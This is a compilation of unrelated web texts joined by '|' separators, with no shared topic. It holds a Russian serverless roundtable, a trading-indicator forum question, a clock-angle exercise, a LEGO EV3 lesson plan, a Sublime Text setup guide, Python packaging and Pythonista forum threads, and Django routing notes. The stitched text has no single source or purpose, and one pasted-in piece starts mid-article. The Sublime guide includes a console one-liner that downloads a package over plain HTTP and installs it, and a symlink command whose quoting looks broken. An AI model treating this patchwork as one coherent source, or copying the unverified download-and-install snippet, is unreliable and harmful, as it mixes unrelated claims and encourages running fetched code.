Решать проблемы планируется при помощи шардирования, что позволит балансировать нагрузку на базу. Также в планах сменить схему хранения данных, а JMS поменять на Kafka – более отказоустойчивое решение, которое урегулирует проблемы с памятью.
Backend-as-a-Service Vs. Serverless
Слева направо: Александр Боргарт, Андрей Томиленко, Николай Марков, Ара Исраелян
Бэкенд как сервис или Serverless-решение? В обсуждении этого актуального вопроса на круглом столе участвовали:
Ара Исраелян, технический директор CTO и основатель Scorocode.
Николай Марков, Senior Data Engineer в компании Aligned Research Group.
Андрей Томиленко, руководитель отдела разработки RUVDS.
Модератором беседы стал старший разработчик Александр Боргарт. Мы приводим дебаты, в которых участвовали и слушатели, в сокращенном варианте.
— Что такое Serverless в вашем понимании?
Андрей: Это модель вычислений – Lambda-функция, которая должна обрабатывать данные так, чтобы результат зависел только от данных. Термин пошел то ли от Гугла, то ли от Амазона и его сервиса AWS Lambda. Провайдеру проще обрабатывать такую функцию, выделив под это пул мощностей. Разные пользователи могут независимо считаться на одних и тех же серверах.
Николай: Если просто — мы переносим какую-то часть своей IT-инфраструктуры, бизнес-логики в облако, на аутсорс.
Ара: Со стороны разработчиков — неплохая попытка сэкономить ресурсы, со стороны маркетологов — заработать побольше денег.
— Serverless — то же, что и микросервисы?
Николай: Нет, Serverless – это больше организация архитектуры. Микросервис – атомарная единица некоей логики. Serverless – подход, а не «отдельная сущность».
Ара: Функцию Serverless можно упаковать в микросервис, но от этого она перестанет быть Serverless, перестанет быть Lambda-функцией. В Serverless работа функции начинается только в тот момент, когда ее запрашивают.
Андрей: Они отличаются временем жизни. Lambda-функцию мы запустили и забыли. Она отработала пару секунд, и следующий клиент может обработать свой запрос на другой физической машине.
— Что лучше масштабируется?
Ара: При горизонтальном масштабировании Lambda-функции ведут себя абсолютно так же, как микросервисы.
Николай: Какое задашь количество реплик – столько их и будет, нет никаких проблем с масштабированием у Serverless. В Kubernetes сделал реплика-сет, запустил 20 инстансов «где-нибудь», и тебе вернулось 20 обезличенных ссылок. Вперед!
— Можно ли писать бэкенд на Serverless?
Андрей: Теоретически, но смысла в этом нет. Lambda-функции будут упираться в единое хранилище – нам же нужно обеспечить гарантированность. Например, если пользователь провел некую транзакцию, то при следующем обращении он должен увидеть: транзакция проведена, средства зачислены. Все Lambda-функции будут блокироваться на этом вызове. По факту куча Serverless-функций превратится в единый сервис с одной узкой точкой обращения к базе данных.
— В каких ситуациях есть смысл применения бессерверной архитектуры?
Андрей: Задачи, в которых не требуется общее хранилище – тот же майнинг, блокчейн. Там, где нужно много считать. Если у вас куча вычислительных мощностей, то вы можете определить функцию типа «посчитай хэш чего-то там…» Но вы можете решить проблему с хранением данных, взяв, например, от Амазона и Lambda-функции, и их распределенное хранилище. И получится, что вы пишете обычный сервис. Lambda-функции будут обращаться к хранилищу и выдавать какой-то ответ пользователю.
Николай: Контейнерчики, которые запускаются в Serverless, крайне ограничены по ресурсам. Там мало памяти и всего остального. Но если у вас вся инфраструктура развернута полностью на каком-то облаке – Гугл, Амазон – и у вас с ними постоянный контракт, есть бюджет на все это, тогда для каких-то задач можно использовать Serverless-контейнеры. Необходимо находиться именно внутри этой инфраструктуры, потому что все заточено под использование в конкретном окружении. То есть если вы готовы завязать все на инфраструктуру облака – можете поэкспериментировать. Плюс в том, что не придется менеджить эту инфраструктуру.
Ара: Что Serverless не требует от вас менеджить Kubernetes, Docker, ставить Kafka и так далее – это самообман. Те же Амазон и Гугл это менеджат и ставят. Другое дело, что у вас есть SLA. С тем же успехом можно отдать все на аутсорсинг, а не программировать самостоятельно.
Андрей: Сам Serverless недорогой, но приходится много платить за остальные амазоновские сервисы – например, базу данных. С ними народ уже судился, за то, что они драли бешеные деньги за API gate.
Ара: Если говорить о деньгах, то нужно учитывать такой момент: вам придется развернуть на 180 градусов всю методологию разработки в компании, чтобы перевести весь код на Serverless. На это уйдет много времени и средств.
— Есть ли достойные альтернативы платным Serverless Амазона и Гугла?
Николай: В Kubernetes вы запускаете какой-то job, он отрабатывает и умирает – это вполне себе Serverless с точки зрения архитектуры. Если хочется реально интересную бизнес-логику создать с очередями, с базами, то нужно чуть больше над этим подумать. Это все решается, не выходя из Kubernetes. Тащить дополнительную реализацию я бы не стал.
— Насколько важно мониторить то, что происходит в Serverless?
Ара: Зависит от архитектуры системы и требований бизнеса. По сути, провайдер должен предоставлять отчетность, которая поможет девопсу разобраться в возможных проблемах.
Николай: В Амазоне есть CloudWatch, куда стримятся все логи, в том числе и с Lambda. Интегрируйте пересылку логов и используйте какой-то отдельный инструмент для просмотра, алертинга и так далее. В контейнеры, которые вы стартуете, можно напихать агентов.
— Давайте подведем итог.
Андрей: Думать о Lambda-функциях полезно. Если вы создаете сервис на коленке – не микросервис, а такой, который пишет запрос, обращается к БД и присылает ответ – Lambda-функция решает целый ряд проблем: с многопоточностью, масштабируемостью и прочим. Если у вас логика построена подобным образом, то в будущем вы сможете эти Lambda перенести в микросервисы или воспользоваться сторонними сервисами наподобие Амазона. Технология полезная, идея интересная. Насколько она оправдана для бизнеса – это пока открытый вопрос.
Николай: Serverless лучше применять для operation-задач, чем для расчета некоей бизнес-логики. Я всегда воспринимаю это как event processing. Если у вас в Амазоне он есть, если вы в Kubernetes – да. Иначе вам придется довольно много усилий приложить, чтобы поднять Serverless самостоятельно. Необходимо смотреть конкретный бизнес-кейс. Например, у меня сейчас одна из задач: когда появляются файлы на диске в определенном формате – нужно их заливать в Kafka. Я это могу использовать WatchDog или Lambda. С точки зрения логики подходят оба варианта, но по реализации Serverless сложнее, и я предпочитаю более простой путь, без Lambda.
Ара: Serverless – идея интересная, применимая, очень технически красивая. Рано или поздно технологии дойдут до того, что любая функция будет подниматься меньше, чем за 100 миллисекунд. Тогда в принципе отпадет вопрос о том, критично ли для пользователя время ожидания. При этом применимость Serverless, как уже говорили коллеги, полностью зависит от бизнес-задачи.
Мы благодарим наших спонсоров, которые нам очень помогли:
Пространство IT- конференций «Весна» за площадку для конференции.
Календарь IT-мероприятий Runet-ID и издание «Интернет в цифрах» за информационную поддержку и новости.
«Акронис» за подарки.
Avito за сотворчество.
«Ассоциацию электронных коммуникаций» РАЭК за вовлеченность и опыт.
Главного спонсора RUVDS — за все!
Автор: TM_content
|
```(aka backtick or grave accent) in a single line before and after the block. See: http://commonmark.org/help/
Tips for better/faster code in my custom indicator - Absolute Strength Histogram
Hi all, I'm coded a backtrader version of the Absolute Strength Histogram (ASH) indicator, wonder if I could get some feedback on "proper/optimized" ways of coding it.
Description and calculation of indicator is from : https://www.mql5.com/en/code/21429
My main issue, is that when coding, I created each line bar by bar, primarily in the "next()" function. And when calculating a weighted average, I couldn't seem to get a BT indicator function to work, so used "numpy" functions.
Another questions, most of the "lines" in my code are for calculations/storing values, is there a recommended way to store these data instead? My understanding is that lines should be mainly for plotting/output.
It seems to work, but clearly not optimal, hope for any suggestions! Thanks!
class ASH(bt.Indicator):
lines = ("SmthBulls", "SmthBears", "Bulls", "Bears", "AvgBulls", "AvgBears", "ash")
params = (("Mode", 0), #RSI = 0, Stoch = 1
("Length", 9),
("Smooth", 1),)
plotinfo = dict(plot=False, subplot=True)
def __init__(self):
self.addminperiod(self.p.Length+self.p.Smooth+5)
self.sma_close = bt.indicators.SMA(self.data, period=1)
self.highest = bt.indicators.Highest(self.data.high, period = self.p.Length)
self.lowest = bt.indicators.Lowest(self.data.low, period = self.p.Length)
def next(self):
if self.p.Mode == 0:
self.l.Bulls[0] = 0.5 * (math.fabs(self.sma_close[0] - self.sma_close[-1]) + (self.sma_close[0] - self.sma_close[-1]))
self.l.Bears[0] = 0.5 * (math.fabs(self.sma_close[0] - self.sma_close[-1]) - (self.sma_close[0] - self.sma_close[-1]))
if self.p.Mode == 1:
self.l.Bulls[0] = self.sma_close[0] - self.lowest[0]
self.l.Bears[0] = self.highest[0] - self.sma_close[0]
if not math.isnan(self.l.Bulls[-1*self.p.Length]) and not math.isnan(self.l.Bears[-1*self.p.Length]):
weights = np.array(range(1, self.p.Length + 1))
avgBullarray = np.array([])
avgBeararray = np.array([])
for i in range(-1 * self.p.Length+1, 1):
avgBullarray = np.append(avgBullarray, self.l.Bulls[i] )
avgBeararray = np.append(avgBeararray, self.l.Bears[i] )
self.l.AvgBulls[0] = np.average(avgBullarray, weights=weights)
self.l.AvgBears[0] = np.average(avgBeararray, weights=weights)
if not math.isnan(self.l.AvgBulls[-1*self.p.Smooth]) and not math.isnan(self.l.AvgBears[-1*self.p.Smooth]):
weights = np.array(range(1, self.p.Smooth + 1))
smthBullarray = np.array([])
smthBeararray = np.array([])
for i in range(-1 * self.p.Smooth+1, 1):
smthBullarray = np.append(smthBullarray, self.l.AvgBulls[i] )
smthBeararray = np.append(smthBeararray, self.l.AvgBears[i] )
self.l.SmthBulls[0] = np.average(smthBullarray, weights=weights)
self.l.SmthBears[0] = np.average(smthBeararray, weights=weights)
self.l.ash[0] = self.l.SmthBulls[0] - self.l.SmthBears[0]
@backtrader Awesome, thks!
|
Условие: С полуночи проходят H часов, M минут и S секунд (0 ≤ H < 12, 0 ≤ M < 60, 0 ≤ S < 60). Определите угол (в градусах) часовой стрелки на циферблате часов прямо сейчас.
Решение:
a = int(input())
b = int(input())
v = int(input())
print(a * 30 + b * 30 / 60 + v * 30 / 3600)
Пояснение: вводим три переменные с помощью input() в Python:
a – количество часов
b – количество минут
v – количество секунд
По ним мы определяем позицию стрелок часов в момент использования (речи).
|
搭建无人驾驶汽车
设计一辆可以实现用户驾驶指令的自动驾驶汽车
课程计划
课前准备
通读教师教学材料。
可根据教学需要使用 EV3 Lab 软件或编程 App 应用程序中的入门教学材料来设计课程。这将有助于学生熟悉乐高®教育 MINDSTORMS®头脑风暴 EV3 机器人套装。
参与(30 分钟)
结合下文“发起一次讨论”部分的提示,组织学生围绕本项目展开讨论。
解释项目。
将整个班级按两人一组方式进行分组。
为学生预留头脑风暴的时间。
探究(30 分钟)
让学生创建多个原型。
鼓励学生探索搭建和编程。
让每组学生搭建并测试两种方案。
解释(60 分钟)
要求学生测试自己的方案,并选出最优的一个。
确保学生能够创建自己的测试表。
为每个团队留些时间来完成项目,并收集他们的工作记录材料。
拓展(60 分钟)
给学生一些时间,让他们完成自己的最终报告。
组织一次分享会,让每个团队展示他们的成果。
评估
为每位学生的课堂表现提供反馈。
可借助所提供的评价量表来简化此环节。
发起一次讨论
如今,汽车中装配了多种导航系统。其中一些系统已经取代了驾驶员,将乘客安全送往目的地。在确定 A 点和 B 点之间的最佳路线之前,自动驾驶汽车必须能够根据用户的输入执行一系列运动。
引入头脑风暴环节。
要求学生思考下列问题:
什么是自动驾驶汽车,它们是如何工作的?
自动驾驶汽车如何确定方向?
为了让汽车沿着一系列城市街道(东、西、南、北坐标格网上)行驶,它需要做什么动作?
给学生留出回答问题的时间:
鼓励学生记录最初想法,并且解释第一原型选用此方案的原因。要求学生描述:如何在整个项目进行过程中评估自己的想法。通过这种方式,他们在审核和修改过程中将会拥有评估自身方案的具体信息,并可籍此来决定方案是否有效。
伪代码是一种很好的工具,可以帮助学生在开始编程之前组织自己的思维。
搭建要诀
从搭建车辆开始。学生可以使用任何建议的乐高®教育 MINDSTORMS® 头脑风暴 EV3 机器人驱动模块模型,或者设计自己的模型。确保可以直接触碰 EV3 程序块顶部的按钮。在这项活动中,这些按钮将被用于控制方向。
编程要诀
向学生解释:他们将对机器人进行编程,使其根据一组记录的指令进行移动,这些指令通过 EV3 程序块上的按钮输入。 请使用下列参数:
按压“上按钮”,机器人向前移动 30 厘米
按压“下按钮”,机器人向后移动 30 厘米
按压“左按钮”,机器人向左转 90 度
按压“右按钮”,机器人向右转 90 度
记录一个动作,使机器人进行移动
程序说明
1.启动此程序。
2.创建一个名为 “Drive” 的变量模块。
3.等待程序块按钮被按压。
4.播放声音 “Click 2”。
5.在变量 “Drive” 中记录被按压按钮的数值。
6.等待 2 秒。
7.播放声音 “G02”。
8.读取存储在变量 “Drive” 中的数字,并将值发送至 Switch 语句。
9.数字 Switch 语句:
a.如果 Drive = 0(默认情况),则不执行任何操作。
b.如果 Drive = 1,将机器人左转弯。
c.如果 Drive = 3,将机器人右转弯。
d.如果 Drive = 4,将机器人的轮子前进 2 圈。
e.如果 Drive = 5,将机器人的轮子后退 2 圈。
10.播放声音 “Game Over 2”。
记录多个动作,使机器人进行移动
“数组运算模块”可用于存储一系列数据,通常被描述为由具有“一行多列”结构的表格。
方案说明
1.启动此程序。
2.创建一个名为 “Drive” 的变量模块。 选择 “WriteNumeric Array” 选项。
3.创建循环。 示例程序被设置为运行 5 次。
4.等待程序块按钮被按压。
5.播放声音 “Click”。
6.读取变量模块 “Drive”。 选择 “Read Numeric Array” 选项。
7.使用“数组运算模块”。 选择 “Write at Index - Numeric”。
a.连接至变量模块 “Drive”。
b.将循环索引从循环的前部连接至“数组运算模块”的索引位置。
c.将“等待 EV3 按钮模块”连接至“数组运算模块”的值位置。
8.将“数组运算模块”的输出写入变量模块 “Drive”。
9.等待 2 秒。
10.播放声音 “Go”。
11.创建第二个循环。示例程序被设置为运行 5 次,与第一个循环的次数相同。
12.读取变量模块 “Drive”。 选择 “Read Numeric Array” 选项。
13.使用“数组运算模块”。选择 “Read at Index - Numeric” 选项。
14.数字 Switch 语句:
a.如果 Drive = 0(默认情况),则不执行任何操作。
b.如果 Drive = 1,将机器人左转弯。
c.如果 Drive = 3,将机器人右转弯。
d.如果 Drive = 4,将机器人的轮子前进 2 圈。
e.如果 Drive = 5,将机器人的轮子后退 2 圈。
15.播放声音 “Game Over 2”。
选项标签 “1” 和 “2”
EV3 MicroPython 程序方案
记录一个动作,使机器人进行移动
#!/usr/bin/env pybricks-micropython
from pybricks import ev3brick as brick
from pybricks.ev3devices import Motor
from pybricks.parameters import Port, Stop, Button, SoundFile
from pybricks.tools import wait
from pybricks.robotics import DriveBase
# The Left, Right, Up, and Down Buttons are used to command the robot.
COMMAND_BUTTONS = (Button.LEFT, Button.RIGHT, Button.UP, Button.DOWN)
# Configure 2 motors with default settings on Ports B and C. These
# will be the left and right motors of the Driving Base.
left_motor = Motor(Port.B)
right_motor = Motor(Port.C)
# The wheel diameter of the Robot Educator Driving Base is 56 mm.
wheel_diameter = 56
# The axle track is the distance between the centers of each of the
# wheels. This is 118 mm for the Robot Educator Driving Base.
axle_track = 118
# The Driving Base is comprised of 2 motors. There is a wheel on each
# motor. The wheel diameter and axle track values are used to make the
# motors move at the correct speed when you give a drive command.
robot = DriveBase(left_motor, right_motor, wheel_diameter, axle_track)
# Wait until one of the command buttons is pressed.
while not any(b in brick.buttons() for b in COMMAND_BUTTONS):
wait(10)
# Store the pressed button as the drive command.
drive_command = brick.buttons()[0]
brick.sound.file(SoundFile.CLICK)
# Wait 2 seconds and then play a sound to indicate that the robot is
# about to drive.
wait(2000)
brick.sound.file(SoundFile.GO)
wait(1000)
# Now drive the robot using the drive command. Depending on which
# button was pressed, drive in a different way.
# The robot turns 90 degrees to the left.
if drive_command == Button.LEFT:
robot.drive_time(100, -90, 1000)
# The robot turns 90 degrees to the right.
elif drive_command == Button.RIGHT:
robot.drive_time(100, 90, 1000)
# The robot drives straight forward 30 cm.
elif drive_command == Button.UP:
robot.drive_time(100, 0, 3000)
# The robot drives straight backward 30 cm.
elif drive_command == Button.DOWN:
robot.drive_time(-100, 0, 3000)
# Play a sound to indicate that it is finished.
brick.sound.file(SoundFile.GAME_OVER)
wait(2000)
记录多个动作,使机器人进行移动
#!/usr/bin/env pybricks-micropython
from pybricks import ev3brick as brick
from pybricks.ev3devices import Motor
from pybricks.parameters import Port, Stop, Button, SoundFile
from pybricks.tools import wait
from pybricks.robotics import DriveBase
# The Left, Right, Up, and Down Buttons are used to command the robot.
COMMAND_BUTTONS = (Button.LEFT, Button.RIGHT, Button.UP, Button.DOWN)
# Configure 2 motors with default settings on Ports B and C. These
# will be the left and right motors of the Driving Base.
left_motor = Motor(Port.B)
right_motor = Motor(Port.C)
# The wheel diameter of the Robot Educator Driving Base is 56 mm.
wheel_diameter = 56
# The axle track is the distance between the centers of each of the
# wheels. This is 118 mm for the Robot Educator Driving Base.
axle_track = 118
# The Driving Base is comprised of 2 motors. There is a wheel on each
# motor. The wheel diameter and axle track values are used to make the
# motors move at the correct speed when you give a drive command.
robot = DriveBase(left_motor, right_motor, wheel_diameter, axle_track)
# Pressing a button stores the command in a list. The list is empty to
# start. It will grow as commands are added to it.
drive_command_list = []
# This loop records the commands in the list. It repeats until 5
# buttons have been pressed. This is done by repeating the loop while
# the list contains less than 5 commands.
while len(drive_command_list) < 5:
# Wait until one of the command buttons is pressed.
while not any(b in brick.buttons() for b in COMMAND_BUTTONS):
wait(10)
# Add the pressed button to the command list.
drive_command_list.append(brick.buttons()[0])
brick.sound.file(SoundFile.CLICK)
# To avoid registering the same command again, wait until the Brick
# Button is released before continuing.
while any(brick.buttons()):
wait(10)
# Wait 2 seconds and then play a sound to indicate that the robot is
# about to drive.
wait(2000)
brick.sound.file(SoundFile.GO)
wait(1000)
# Now drive the robot using the list of stored commands. This is done
# by going over each command in the list in a loop.
for drive_command in drive_command_list:
# The robot turns 90 degrees to the left.
if drive_command == Button.LEFT:
robot.drive_time(100, -90, 1000)
# The robot turns 90 degrees to the right.
elif drive_command == Button.RIGHT:
robot.drive_time(100, 90, 1000)
# The robot drives straight forward 30 cm.
elif drive_command == Button.UP:
robot.drive_time(100, 0, 3000)
# The robot drives straight backward 30 cm.
elif drive_command == Button.DOWN:
robot.drive_time(-100, 0, 3000)
# Play a sound to indicate that it is finished.
brick.sound.file(SoundFile.GAME_OVER)
wait(2000)
拓展
语言艺术拓展
选项 1
探索基于文本的编程方式:
让学生探索基于文本的编程方式,以便他们比较不同的编程语言。
选项 2
在本节课中,学生创建了一辆根据数组中的指令运行的无人驾驶汽车。如果未来的无人驾驶汽车能够覆盖人类驾驶员的指令,该怎么办?
为了引入语言艺术能力培养环节,让学生:
写一篇支持以下论点的议论文:无人驾驶汽车不应不顾乘客的意见而自主控制速度
收集支持该论点的具体证据,并列举可能令乘客处于不利地位的情景实例
确保提出反驳论点:由无人驾驶汽车自动控制车速可能是提高驾驶员或交通安全的有效策略
数学拓展
在本节课中,学生为无人驾驶汽车创建了一个逐向 (turn-by-turn) 指令序列。借助传感器和机器学习,无人驾驶汽车可以遵循指令,并根据新状况修改这些指令的执行。
为了提高数学技能,并探索机器学习在无人驾驶汽车中的应用,请为学生设定一定转弯数所需的“预算”。然后要求他们:
创建一个网格来代表城市街道(例如,5 条东西走向的街道和 5 条南北走向的街道)
选择起点和目的地 · 请记住,转弯最少的路径为最佳路径,分析起点和目的地之间的三个交点
确定车辆从随机方向以“低于预算”的方式到达目的地的概率
评估环节
教师观察清单
可根据教学需要设定等级,例如:
1.部分完成
2.全部完成
3.超额完成
请使用下列成功完成任务的标准来评估学生的进度:
学生能够识别问题的关键要素。
学生能够自主开发出可行且富有创意的方案。
学生能够清楚地交流他们的想法。
自我评估
当学生收集到所需的性能数据后,给他们一些时间反思自己的方案。通过提出如下问题来帮助他们:
你们的方案是否符合“设计任务”的标准?
你们的机器人运动的能够更精准些吗?
其他人解决这个问题时采用了哪些方法?
要求学生进行头脑风暴,并记录两种能够改进他们方案的方法。
同伴反馈
推动学生进行同伴审核,由每个小组负责评价自己及其他小组的项目。此审核过程能够培养学生提供建设性反馈的能力,提升他们的分析能力和使用客观数据支持论点的能力。
职业连接
喜欢这节课的学生可能会对以下相关行业产生兴趣:
商业与金融(创业学)
制造与工程(工程预科)
教师支持
学生将会:
运用设计流程解决实际问题
开源硬件项目设计模块
6.3 基于事物特征的分析,设计基于开源硬件的作品开发方案,描述作品各组成部分及其功能作用,明确各组成部分之间的调用关系。
6.4 根据设计方案,选择恰当的开源硬件,搜索相关的使用说明资料,审查与优化作品设计方案。
6.5 了解作品制作过程中各种设备与组件的安全使用规则和方法,根据设计方案,利用开源硬件、相关组件与材料,完成作品制作。
6.6 根据设计方案,利用开源硬件的设计工具或编程语言,实现作品的各种功能模块。
6.7 根据设计方案,测试、运行作品的数据采集、运算处理、数据输出、调控执行等各项功能,优化设计方案。
|
选择一个好的编辑器能够极大的提高前端开发效率
Sublime Text
subl Shell命令设置
为了方便在终端直接用SublimeText打开我们的项目,为此可以设置一下Subl来软链接到实际的路径。
#bash shell
ln -s "/Applications/Sublime\ Text.app/Contents/SharedSupport/bin/subl" /usr/bin/subl
#zsh shell
alias subl="'/Applications/Sublime Text.app/Contents/SharedSupport/bin/subl'"
# 设置SublimeText为默认编辑器
export EDITOR="subl"
设置完之后需要执行下面代码将我们的设置生效:
#bash shellsource ~/.bash_profile#zsh shellsource ~/.zshrc
这时候就可以在我们的项目里面执行下面代码直接用SublimeText打开项目:
subl .# more helpsubl help
编辑器配置
下面是我个人的一些配置,根据个人喜好可以进行修改:
# 修改配置路径: Sublime Text -> Preferences -> Settings-User
"always_show_minimap_viewport": true, #是否总是显示小地图
"draw_minimap_border": true, # 让minimap里的当前位置更显眼点.
"highlight_line": true, # 高亮当前行
"highlight_modified_tabs": true, # 修改了而尚未保存的 tab, 会用橘黄色显示
"ignored_packages":
[
"Vintage"
],
"show_encoding": true, # 显示文件编码
"show_full_path": true, # 标题栏上显示完整路径
"show_line_endings": true, # 文档到达底部会在最后一行
"open_files_in_new_window": false, # 在 Finder 里打开文件时, 不会新开窗口了
"translate_tabs_to_spaces": true #将tab键的形式转成空格
Package Control
SublimeText所有插件都依赖于Package Control,默认情况下Package Control没有自带的,需要手动安装,打开SublimeText之后在菜单栏的View -> show Console,将下面代码贴入控制台并回车。
SublimeText 3 版本
import urllib.request,os; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path();urllib.request.install_opener(urllib.request.build_opener( urllib.request.ProxyHandler()) );open(os.path.join(ipp, pf), 'wb').write(urllib.request.urlopen('http://sublime.wbond.net/' + pf.replace(' ','%20')).read())
SublimeText 2 版本
import urllib2,os; pf='Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler())); open( os.path.join( ipp, pf), 'wb' ).write( urllib2.urlopen('http://sublime.wbond.net/' +pf.replace( ' ','%20')).read()); print( 'Please restart Sublime Text to finish installation')
上面装完之后就可以command + shift + p,搜索需要安装的插件了。
推荐主题
强烈推荐Material Theme。
预览效果:
推荐插件
SublimeText的最大一个组成部分就是插件,个人觉得插件能够达到精简实用最好,下面推荐一些常用的插件,仅供参考。
# 下面插件的安装方法shift + cmd + p 打开命令面板输入 “Package Control: Install Package” 命令输入 插件的名称 , 找到后回车安装安装成功后在preferences中选择主题
Emmet (前端工程师利器,各种代码补全自动生成,更多介绍移步 官方文档)
converttoUTF8(文档转码工具)
git(git的一些操作都可以在这里进行)
sidebarenhancement(侧边栏增强,在侧边右键之后多了一些功能,挺实用的)
docblockr(文档注释,输入/*之后按一下tab就可以生成文档注释)
Bracket Highlighter(匹配括号高亮,自带的感觉高亮不强)
SCSS(sass高亮)
markdownPerview(写markdown可以command+b直接生成html预览)
evernote(配合markdownPerview就可以写markdown同步到evernote去了)
Visual Studio Code
Visual Studio Code 简洁的设计,高亮区全局显示,集成的控制台、版本控制,丰富的插件系统,便捷的分栏显示和"禅"模式等等功能都是以往编辑器特性的集大成者,墙裂推荐。
|
Cryptic error language in the pip/PyPi frontend
MauriceMeilleurlast edited by MauriceMeilleur
Here's another one of those âif I knew Python better I'd know the answer already' questions, probably, but: what is this error message telling me, exactly?
MauriceMeilleurlast edited by
In case it's relevant, here is the result of the search:
search tries to match the search term with possible PyPi projects.
you can pip install
nodebox-openglorNodeBoxornodebox-color.
and I think
nodeboxis the the itself app and has nosetup.py.
MauriceMeilleurlast edited by gferreira
Funny, not for meâcan't find a package for
NodeBox, and errors fornodebox-openglandnodebox-color:
These are similar to the error I got and reported on PageBot's GitHub repo trying to install PageBot (or re-install it, since I thought we'd solved the problems I was having last October and I'd installed it successfully):
Collecting pagebot
Using cached https://files.pythonhosted.org/packages/ce/b5/85ecaa46445effb02ea7e127aae95136a813bd44565d7a6f48e14989d64e/pagebot-0.9.3-py3-none-any.whl
Collecting booleanOperations
Downloading https://files.pythonhosted.org/packages/fc/c6/c4cae54f482465a33c5f011d95ec64293dce9e012dac7873147c2dc85396/booleanOperations-0.9.0-py3-none-any.whl
Collecting tornado
Using cached https://files.pythonhosted.org/packages/30/78/2d2823598496127b21423baffaa186b668f73cd91887fcef78b6eade136b/tornado-6.0.3.tar.gz
ERROR: Command errored out with exit status 1:
command: /Applications/DrawBot.app/Contents/MacOS/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/private/tmp/pip-install-anyjj7fg/tornado/setup.py'"'"'; __file__='"'"'/private/tmp/pip-install-anyjj7fg/tornado/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' --no-user-cfg egg_info --egg-base /private/tmp/pip-install-anyjj7fg/tornado/pip-egg-info
cwd: /private/tmp/pip-install-anyjj7fg/tornado/
Complete output (6 lines):
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "setuptools/__init__.pyc", line 20, in <module>
File "setuptools/dist.pyc", line 30, in <module>
File "setuptools/extern/__init__.pyc", line 61, in load_module
ImportError: The 'packaging' package is required; normally this is bundled with this package so if you get this warning, consult the packager of your distribution.
----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.
this should be resolved in the latest update!!!
|
NavView Template
niz
I've created a NavView template and put it on GitHub for anyone to use as a starting point for creating a NavView based app using Pythonista. https://github.com/ncarding/NavViewTemplate
I've done this because it took me ages to workout how to do it myself and I wanted to give something back to the community that unknowingly helped me workout all the problems along the way.
There is however a fairly large bug with the template that needs fixing before it is truly useful. I've tried various things and I just can't workout why the bug is there and how to fix it.
As it stands the NavView has two levels: Groups and People. You can create as many Groups as you like and have as many People in each group as you like.
The UI is built with Pythonista's ui module. The logic uses a custom object orientated module called simple_module. The objects that are created are saved and loaded (for persistence) using the pickle module.
Known Issue
The People lists should be independent of the Group lists, but at the moment they are not.
If you add a new Group then add one or more People to that group and then add a second Group, the People from the first Group are automatically added to the second and any additional Groups.
I can't tell where the bug is but it only effects Groups created with each launch of the app. E.g. If you create three Groups they will all contain the same People. If you then quit the app and relaunch it those people will still be in each Group but if you create more Groups they will not contain the original list of People. These new Groups will however all share any new People added to any of the Groups created in this session.
Any suggestions as to why this is happening and how I might fix it are welcome.
All the code is at https://github.com/ncarding/NavViewTemplate
abcabc
The "
init" method in simple_module.py is not correct. You can not have "empty list" as default parameter.
See the discussion here.
http://effbot.org/zone/default-values.htm
http://docs.python-guide.org/en/latest/writing/gotchas/
Mostly this should fix your bug. I have not tested it.
class Group():
def __init__(self, name, people = []):
self.name = name
# people is a list of People objects
self.people = people
ccc
The "fix" code contains an empty list as a default parameter. :-(. I would suggest:
class Group():
def __init__(self, name, people=None):
self.name = name
# people is a list of People objects
self.people = people or [] # converts None into an empty list
abcabc
It is not the fix. It is the part of the code that has the problem. I should have worded that properly. Anyway thanks for the correction.
ccc
I made a pull request on the repo so there is no ambiguity... I think you are correct that it should solve the open issue.
ccc
niz
Thank you for your help. This has indeed fixed the problem.
The code is there for anyone that wants to make use of it.
Phuket2
@niz , thanks for sharing. I have just tried it as I have doing nothing with the nav view before, well at least that I can remember.
But 2 things that stand out.
Seems like it would be easy to make it Python 2.7 and 3 compatible with a try on the pickle import, and maybe a protocol change that either version of pickle loaded could read an existing file.
Support for different presentations, i.e. Sheet, panel.
Just an idea
Phuket2
niz
Thanks @Phuket2 for the suggestions. I will look into them.
|
一.API和URL路径的命令规范
1.如果需要URL的路径支持View 视图的话,需要将URL的路径名和API 路由的注册名一致。
例如:
view url的路径规则如下:
url(r'^category/$', category.CategoryListView.as_view(), name='category-list'),
url(r'^category/create/$', category.CategoryCreateView.as_view(), name='category-create'),
url(r'^category/(?P<pk>[0-9a-zA-Z\-]{36})/update/$', category.CategoryUpdateView.as_view(), name='category-update'),
url(r'^category/(?P<pk>[0-9a-zA-Z\-]{36})/$', category.CategoryDetailView.as_view(), name='category-detail'),
url(r'^category/(?P<pk>[0-9a-zA-Z\-]{36})/delete/$', category.CategoryDeleteView.as_view(), name='category-delete'),
url(r'^category/(?P<pk>[0-9a-zA-Z\-]{36})/user/$', category.CategoryUserView.as_view(), name='category-user-list'),
url(r'^site/$', site.SiteListView.as_view(), name='site-list'),
url(r'^site/create/$', site.SiteCreateView.as_view(), name='site-create'),
url(r'^site/(?P<pk>[0-9a-zA-Z\-]{36})/update/$', site.SiteUpdateView.as_view(), name='site-update'),
url(r'^site/(?P<pk>[0-9a-zA-Z\-]{36})/$', site.SiteDetailView.as_view(), name='site-detail'),
url(r'^site/(?P<pk>[0-9a-zA-Z\-]{36})/delete/$', site.SiteDeleteView.as_view(), name='site-delete')
那么需要将API的路由规则设置为:
router = BulkRouter()
router.register(r'v1/site', api.SiteViewSet, 'site')
router.register(r'v1/category', api.CategoryViewSet, 'category')
即router.register的第三个参数需要和url的第一个路径匹配。就是说
router.register(r'v1/api name', api.SiteViewSet, 'API匹配值')
url(r'^API匹配值/$', site.SiteListView.as_view(), name='url name'),
其中 “api name” 和 “url name” 只需要符合你自己的规则就行了,当然,我也可以将 “api name” 填成一个非常难记或者难猜的名称也可以。
比如以下这种写法,url也还是能自动匹配到的
router.register(r'v1/site', api.SiteViewSet, 'site')
router.register(r'v1/dsacategory', api.CategoryViewSet, 'category')
实现效果
是不是它自动更改了API的请求路径,但是后台也还是能够正常匹配到路径。
使用以下模板标签获取后台的数据
{% url 'api-nav:category-list' %}
它实际请求的为 View 里面的 category-list方法。
